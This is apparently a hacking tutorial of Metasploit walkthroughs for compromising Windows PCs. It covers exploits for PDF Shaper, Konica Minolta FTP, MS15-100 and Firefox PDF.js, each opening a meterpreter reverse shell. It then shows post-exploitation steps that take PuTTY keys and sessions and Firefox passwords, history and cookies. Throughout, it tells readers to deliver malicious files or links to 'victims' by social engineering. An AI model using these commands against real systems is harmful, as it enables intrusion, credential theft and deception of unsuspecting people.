Hack Remote Windows PC using PDF Shaper Buffer Overflow

PDF Shaper is prone to security vulnerability when processing PDF files. The vulnerability appear when we use Convert PDF to Image and use a specially crafted PDF file. This Metasploit module has been tested successfully on Win Xp, Win 7, Win 8, and Win 10.

Exploit Targets

PDF Shaper

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/fileformat/pdf_shaper_bof

msf exploit (pdf_shaper_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (pdf_shaper_bof)>set lhost 192.168.1.16 (IP of Local Host)

msf exploit (pdf_shaper_bof)>exploit  

After we successfully generate the malicious pdf File, it will stored on your local computer

/root/.msf4/local/msf.pdf

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.16

exploit

Now send your msf.pdf files to victim using any social engineering technique. Now when the victim will use PDF Shaper tool and click on PDF to Image option

Now it will show Add File Option, victim will select the msf.pdf and click on Convert option.

Now you will get the meterpreter of victim PC.

Hack Remote Windows PC using Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow

This module exploits an SEH overflow in Konica Minolta FTP Server 1.00. Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which leads to an SEH overflow. Konica FTP allows anonymous access by default; valid credentials are typically unnecessary to exploit this vulnerability.

Exploit Targets

Konica Minolta FTP Server 1.00

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/ftp/kmftp_utility_cwd

msf exploit (kmftp_utility_cwd)>set payload windows/meterpreter/reverse_tcp

msf exploit (kmftp_utility_cwd)>set lhost 192.168.1.5 (IP of Local Host)

msf exploit (kmftp_utility_cwd)>set rhost 192.168.1.7

msf exploit (kmftp_utility_cwd)>set FTPUSER anonymous

msf exploit (kmftp_utility_cwd)>set FTPPASS raj

msf exploit (kmftp_utility_cwd)>exploit

Hack Remote Windows PC using MS15-100 Microsoft Windows Media Center MCL Vulnerability

This module exploits vulnerability in Windows Media Center. By supplying an UNC path in the *.mcl file, a remote file will be automatically downloaded, which can result in arbitrary code execution.

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/fileformat/ms15_100_mclexe

msf exploit (ms15_100_mclexe)>set payload windows/meterpreter/reverse_tcp

msf exploit (ms15_100_mclexe)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (ms15_100_mclexe)>set lport 443

msf exploit (ms15_100_mclexe)>exploit

Now when the victim opens the following link (file://192.168.1.7/aqxtlL/msf.exe) it will show the page like given below

Now type sessions –l to display sessions opened when the victim opens the link

Now the session has opened type sysinfo to get system information, then type shell to enter into Victims command prompt.

How to Hack Saved sessions in Putty using Metasploit

This module will identify whether Pageant (PuTTY Agent) is running and obtain saved session information from the registry. PuTTY is very configurable; some users may have configured saved sessions which could include a username, private key file to use when authenticating, host name etc. If a private key is configured, an attempt will be made to download and store it in loot. It will also record the SSH host keys which have been stored. These will be connections that the user has previously after accepting the host SSH fingerprint and therefore are of particular interest if they are within scope of a penetration test.

Exploit Targets

Putty

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use post/windows/gather/enum_putty_saved_sessions

msf exploit (enum_putty_saved_sessions)>set payload windows/meterpreter/reverse_tcp

msf exploit (enum_putty_saved_sessions)>set lhost 192.168.0.121 (IP of Local Host)

msf exploit (enum_putty_saved_sessions)>set session 1

msf exploit (enum_putty_saved_sessions)>exploit  

The above exploit will save all session in the specified folder. Open the folder and click on session file. It will show us the session information.

Hack Remote PC using Firefox PDF.js Privileged Javascript Injection

This module gains remote code execution on Firefox 35-36 by abusing a privilege escalation bug in resource:// URIs. PDF.js is used to exploit the bug. This exploit requires the user to click anywhere on the page to trigger the vulnerability.

Exploit Targets

Firefox 35-36

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/browser/firefox_pdfjs_privilege_escalation

msf exploit (firefox_pdfjs_privilege_escalation)>set payload windows/meterpreter/reverse_tcp

msf exploit (firefox_pdfjs_privilege_escalation)>set lhost 192.168.0.121 (IP of Local Host)

msf exploit (firefox_pdfjs_privilege_escalation)>set srvhost 192.168.0.121

msf exploit (firefox_pdfjs_privilege_escalation)>set uripath /

msf exploit (firefox_pdfjs_privilege_escalation)>exploit

Now an URL you should give to your victim http://192.168.0.121:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the following link (http://192.168.0.121:8080).  It will show the page like given below .And when victim will manually click on the click here option.

Now a session will be opened as shown below.

If you want to gather the user passwords stored through Firefox Browser. Use the following commands.

Now type use post/firefox/gather/passwords

msf exploit (passwords)>set session 1

msf exploit (passwords)>exploit

After running the privileged JavaScript, it will show the path where passwords will be saved.

Now open the file and get the user names and passwords stored through Firefox browser.

To see the history of the Firefox, run the below given exploit.

Now type use post/firefox/gather/history

msf exploit (history)>set session 1

msf exploit (history)>exploit

After running this exploit, go to the path where history entries are stored. It will show us the URLs visited by the victim.

To gather information about the browser cookies, run the given below exploit .

Now type use post/firefox/gather/cookies

msf exploit (cookies)>set session 1

msf exploit (cookies)>exploit  

The above exploit will save all cookies in the specified folder. Open the folder and click on cookies file.It will show us the cookies information.